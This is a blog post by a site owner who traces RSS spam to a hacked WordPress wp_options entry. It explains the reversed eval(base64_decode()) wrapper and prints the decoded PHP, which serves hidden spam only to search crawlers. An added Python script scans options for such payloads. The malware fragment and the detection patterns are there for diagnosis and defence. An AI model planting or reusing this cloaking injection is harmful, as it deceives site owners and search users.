RSS Spam Problem Fixed
I found the immediate cause of the Google Reader spam problem, thanks to this thread. It turns out that someone was able to get a hacked entry into the database (specifically, into the wp_options table). The important parts of the entry look like this:
;))"==QfK0wOpcyMyEzbo [... lots more gibberish-looking stuff, which is actually base64_encode()'d stuff] J3byJXZ"(edoced_46esab(lave'
Now, read that backwards, and it says:
eval(base64_decode(" [gibberish] "));
After reversing and decoding the string of gibberish, we get the following code, which somehow gets injected into the rendering of the RSS:
("+(n[1]-1)+")<");
arr[i].innerHTML=txt;
}
}
}catch(e){};
};
addLoadEvent(setUserName);
</script>';
}
} }
add_action('admin_head','admin123');
}
}
if(!function_exists('echo123')){ function echo123(){
global $e123;
if($e123) return;
$txt=get_option('internal_links_cache');
if($txt!="") echo base64_decode($txt);
} }
if(!function_exists('echo323')){ function echo323($c){
global $e123;
if($e123) return;
$e123=true;
$txt=get_option('internal_links_cache');
if($txt!="") return base64_decode($txt).$c;
return $c;
} }
if(preg_match("/bot|google|slurp|bing|msn|charlotte|crawl|yahoo|search|spider|inktomi|ask|alexa|seek/",$_SERVER["HTTP_USER_AGENT"])&&sizeof($_COOKIE)==0){
add_action('the_content','echo323');
add_action('wp_footer','echo123');
}
Reading the parameter passed to the preg_match() function, I now see why the spam appeared in Google Reader but not Bloglines. Here’s what I don’t know:
- Who did this?
- How did this get into the database in the first place?
- How does that reversed code get un-reversed so that it can get evaluated and run?
- How do I prevent this stuff from happening again?
I will be following the thread to see what other solutions people are able to come up with, or if anyone is able to track the crackers down. Please leave comments here or there if you are able to figure anything else out. Thanks.
(Don’t forget what started this all — we’re playing a gig in Lindenhurst on August 14th!)
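An added example, not part of the original post: a Python check over exported wp_options rows that flags the two things seen above, the reversed eval(base64_decode( wrapper and a base64 value (like internal_links_cache) that decodes to markup. The sample rows, the rss_placeholder option name, the spam.example URL and the markup heuristics are constructed assumptions.

```python
import base64
import re

# Call names from the injected entry in this post; checked forwards and reversed.
MARKERS = ("eval(", "base64_decode(")
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
# Assumed heuristic for "decodes to spam markup" (not taken from the post).
MARKUP_RE = re.compile(r"<\s*(script|a|iframe|div)\b|display\s*:\s*none", re.I)

def decodes_to_markup(value):
    """True if the whole value is base64 that decodes to HTML or script."""
    compact = "".join(value.split())
    if not BASE64_RE.match(compact):
        return False
    try:
        decoded = base64.b64decode(compact, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return bool(MARKUP_RE.search(decoded.decode("utf-8", "replace")))

def scan_option(name, value):
    """Return a list of reasons why one wp_options row looks injected."""
    reasons = []
    lowered = value.lower()
    for marker in MARKERS:
        if marker in lowered:
            reasons.append(f"contains {marker}")
        if marker[::-1] in lowered:
            reasons.append(f"contains reversed {marker}")
    if decodes_to_markup(value):
        reasons.append("base64 that decodes to markup")
    return reasons

def scan_options(rows):
    """rows: iterable of (option_name, option_value) pairs exported from the table."""
    return {n: r for n, v in rows if (r := scan_option(n, v))}

# Constructed sample rows (not the real payload from this site).
SAMPLE_ROWS = [
    ("blogname", "My Band Blog"),
    ("rss_placeholder", ';))"==QfK0wOp"(edoced_46esab(lave\''),
    ("internal_links_cache", base64.b64encode(
        b'<div style="display:none"><a href="http://spam.example/">x</a></div>'
    ).decode()),
    ("active_plugins", 'a:1:{i:0;s:19:"akismet/akismet.php";}'),
]

if __name__ == "__main__":
    for name, reasons in scan_options(SAMPLE_ROWS).items():
        print(name, "->", ", ".join(reasons))
```

A hit is only a lead for manual review of that row; a legitimate plugin can also store base64 or markup in an option.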




